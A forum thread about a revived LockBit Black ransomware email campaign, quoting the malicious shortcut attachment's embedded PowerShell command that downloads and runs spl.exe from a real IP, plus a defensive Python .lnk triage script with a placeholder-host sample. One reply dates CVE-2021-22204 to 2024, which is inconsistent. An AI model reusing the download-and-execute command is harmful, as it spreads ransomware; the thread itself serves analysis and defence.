Ransomware mail campaign from May 2024 is active again
My server is getting blasted with tons of messages as described at the following site (and many others) with Jenny@gsd.com and an attached document:
https://www.msspalert.com/news/lockbit-black-ransomware-campaign-spraying-millions-of-messages
The contents of the document in one email look like this:
cat Document/Document.doc.lnk
L�F� r��tg��oH��}�a��tg���5P�O� �:i�+00�/C:\V1�[G�Windows@ ヌOwH$\L�.Y��:WindowsZ1$\jSystem32B ヌOwH$\��.U�WֲSystem32V2��X�� cmd.exe@ ᄊX��$\��.jg�4�cmd.exeJ-Im4/FC:\Windows\System32\cmd.exe!..\..\..\Windows\System32\cmd.exe�/c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe'
Yep just got hundreds of those emails today. They all point to 178.16.54.109 but spl.exe 404's so it looks like the abused hosting provider has already squashed this malware campaign out. Bummer, I would've loved to analyze this spl.exe encryptor and maybe also troll the attacker. Also fyi, somehow, exiftool supports .lnk files so you can read the full command of the lnk cleanly with that.

Good idea, I wasn't aware of exiftool, thanks for the suggestion. Although it apparently had a bad vulnerability in 2024, CVE-2021-22204, which if I'm reading it right would mean that just reading a hacked file with it could mean remote code execution.
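As an added example (not posted by anyone in this thread), here is a small pure-Python reader for the Shell Link (.lnk) format that pulls the COMMAND_LINE_ARGUMENTS string out of a shortcut like the attachment above without running it and without a third-party tool, then flags the markers a mail gateway or analyst would want to see. The sample shortcut it parses is constructed in the script, with the real download host replaced by a placeholder.

```python
import struct

# LinkFlags bits (MS-SHLLINK section 2.1.1) that decide what follows the 76-byte header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
# Markers worth flagging in a mailed shortcut's argument string (compared lower-cased)
SUSPICIOUS = ("powershell", "executionpolicy bypass", "downloadfile", "http://",
              "https://", "start-process")

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link (.lnk) file as a dict."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    out = {}
    for flag, name in STRING_FIELDS:      # present fields appear in this fixed order
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            pos += 2 + count * width
            out[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return out

def triage(data: bytes) -> list:
    """List the SUSPICIOUS markers present in the shortcut's command-line arguments."""
    args = parse_lnk_strings(data).get("arguments", "").lower()
    return [m for m in SUSPICIOUS if m in args]

# Constructed test input: a minimal .lnk carrying only COMMAND_LINE_ARGUMENTS, shaped like
# the attachment quoted in the thread but with the real host replaced by a placeholder.
SAMPLE_ARGS = ("/c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient)"
               ".DownloadFile('http://placeholder.invalid/spl.exe','%userprofile%\\windrv.exe');"
               "Start-Process '%userprofile%\\windrv.exe'")
SAMPLE_LNK = (struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_ARGUMENTS | IS_UNICODE)
              + bytes(0x4C - 24) + struct.pack("<H", len(SAMPLE_ARGS))
              + SAMPLE_ARGS.encode("utf-16-le"))
```

To check a real attachment, call `triage(open(path, "rb").read())`; a non-empty list is a reason to quarantine the message before anyone double-clicks the file.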